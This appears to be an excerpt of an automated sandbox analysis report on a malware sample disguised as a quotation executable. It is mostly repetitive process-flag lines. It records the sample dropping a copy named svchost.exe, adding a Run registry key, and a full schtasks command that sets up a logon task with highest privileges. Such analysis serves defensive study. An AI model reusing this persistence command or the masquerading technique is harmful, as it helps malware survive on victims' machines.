                        barindex
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00406EB0 ShellExecuteW,URLDownloadToFileW,26_2_00406EB0
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041AA4A
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,26_2_0041CB50
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
